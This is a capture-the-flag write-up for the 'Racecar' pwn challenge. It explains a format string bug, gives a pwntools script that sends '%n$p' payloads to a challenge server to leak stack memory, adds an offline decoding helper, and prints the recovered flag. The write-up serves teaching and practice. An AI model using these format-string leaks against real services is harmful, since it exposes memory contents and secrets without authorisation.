Racecar
CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!
This binary is vulnerable to a format string vulnerability, and since the flag is stored on the stack, we can use the format string bug to leak it out of the stack.
┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
______ |xxx|
/|_||_\`.__ | F |
( _ _ _\ |xxx|
*** =`-(_)--(_)-' | I |
|xxx|
| N |
|xxx|
| I |
|xxx|
_-_- _/\______\__ | S |
_-_-__ / ,-. -|- ,-.`-. |xxx|
_-_- `( o )----( o )-' | H |
`-' `-' |xxx|
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
Insert your data:
Name: name
Nickname: something
[+] Welcome [name]!
[*] Your name is [name] but everybody calls you.. [something]!
[*] Current coins: [69]
1. Car info
2. Car selection
> 2
Select car:
1. 🚗
2. 🏎
> 2
Select race:
1. Highway battle
2. Circuit
> 1
[*] Waiting for the race to finish...
[+] You won the race!! You get 100 coins!
[+] Current coins: [169]
[!] Do you have anything to say to the press after your big victory?
> %p %p %p %p %p %p %p %p
The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this:
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1
We don't know the position on the stack of the variable that holds the flag, so we fuzz the stack and keep leaking until the flag appears. To do that we build a fuzzer script in Python:
from pwn import *

flag = ''

# Leak the stack one slot at a time: %i$p prints the i-th argument
# that printf reads off the stack as a pointer
for i in range(100):
    try:
        # Connect to the challenge instance
        io = remote('83.136.253.251', 42831)
        io.sendlineafter(b'Name: ', b'anas')
        io.sendlineafter(b'Nickname: ', b'something')
        io.sendlineafter(b'> ', b'2')  # Car selection
        io.sendlineafter(b'> ', b'2')  # second car
        io.sendlineafter(b'> ', b'1')  # Highway battle
        # Format the counter, e.g. %12$p leaks the 12th pointer
        io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
        # Skip the two lines printed before the leaked value
        io.recvline()
        io.recvline()
        result = io.recv()
        io.close()
        if b'nil' not in result:
            print(str(i) + ': ' + str(result))
            try:
                # Decode the hex and reverse the byte order (little-endian)
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                print(str(reversed_hex))
                # Build up the flag
                flag += reversed_hex.decode()
            except ValueError:
                # Bytes that are not valid text are not part of the flag
                pass
    except EOFError:
        pass

# Print the assembled flag
info(flag)
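The decoding step the fuzzer relies on (each leaked `%p` word is a little-endian 32-bit value, so its bytes have to be reversed before they read as text, and `(nil)` or odd-length values such as `0x1` have to be skipped or padded) can be checked offline before touching the service. The following is an added example and not part of the original writeup or the challenge; it reuses the pointer values printed above as constructed input, and the names `SAMPLE_LEAKS`, `decode_slot`, `is_text_chunk`, `join_printable` and `assemble_flag` are my own. It also covers the case the script above glosses over: small values like `0x42` decode to a printable `B`, so the result is anchored on the known `HTB{` prefix and the closing brace rather than on "everything that decodes".

```python
import re

# Constructed input: the pointer values this writeup's fuzzer printed,
# keyed by stack slot. Slots 1-8 are the values from the first
# "%p %p ..." probe, slots 12-22 are the flag words from the fuzzer run.
SAMPLE_LEAKS = {
    1: b'0x583ec200\n', 2: b'0x170\n', 3: b'0x565bfdfa\n', 4: b'0x42\n',
    5: b'(nil)\n', 6: b'0x26\n', 7: b'0x2\n', 8: b'0x1\n',
    12: b'0x7b425448\n', 13: b'0x5f796877\n', 14: b'0x5f643164\n',
    15: b'0x34735f31\n', 16: b'0x745f3376\n', 17: b'0x665f3368\n',
    18: b'0x5f67346c\n', 19: b'0x745f6e30\n', 20: b'0x355f3368\n',
    21: b'0x6b633474\n', 22: b'0x7d213f\n',
}

# A %p leak is either "(nil)" or 0x followed by hex digits with leading
# zeros dropped, so the digit count can be odd.
HEX_PTR = re.compile(rb'^0x([0-9a-fA-F]+)$')


def decode_slot(raw):
    """Return the bytes behind one %p leak, in memory order, or None.

    printf prints the 32-bit word as a big-endian number, but the flag was
    stored little-endian, so the decoded bytes are reversed to recover the
    original order. Odd-length hex is left-padded so fromhex accepts it.
    """
    m = HEX_PTR.match(raw.strip())
    if m is None:
        return None
    digits = m.group(1).decode()
    if len(digits) % 2:
        digits = '0' + digits
    return bytes.fromhex(digits)[::-1]


def is_text_chunk(chunk):
    """A slot belongs to the flag only if every byte is printable ASCII."""
    return bool(chunk) and all(0x20 <= b < 0x7f for b in chunk)


def join_printable(leaks):
    """Walk the slots in stack order and concatenate the printable ones."""
    text = ''
    for slot in sorted(leaks):
        chunk = decode_slot(leaks[slot])
        if chunk is not None and is_text_chunk(chunk):
            text += chunk.decode('ascii')
    return text


def assemble_flag(leaks, prefix='HTB{'):
    """Extract the flag from the joined text, ignoring stray printable words.

    Small values such as 0x42 ('B') or 0x26 ('&') decode to printable
    characters too, so anchoring on the known prefix and the closing brace
    is what keeps them out of the result.
    """
    m = re.search(re.escape(prefix) + r'[^}]*\}', join_printable(leaks))
    return m.group(0) if m else None


if __name__ == '__main__':
    print(join_printable(SAMPLE_LEAKS))   # shows the stray 'B&' before the flag
    print(assemble_flag(SAMPLE_LEAKS))
```

Running the block on the constructed sample prints `B&HTB{...}` for the raw join and the clean flag for `assemble_flag`, which is the difference between "append everything that decodes" and "extract the delimited flag".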
Let's run the fuzzer:
┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py
...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}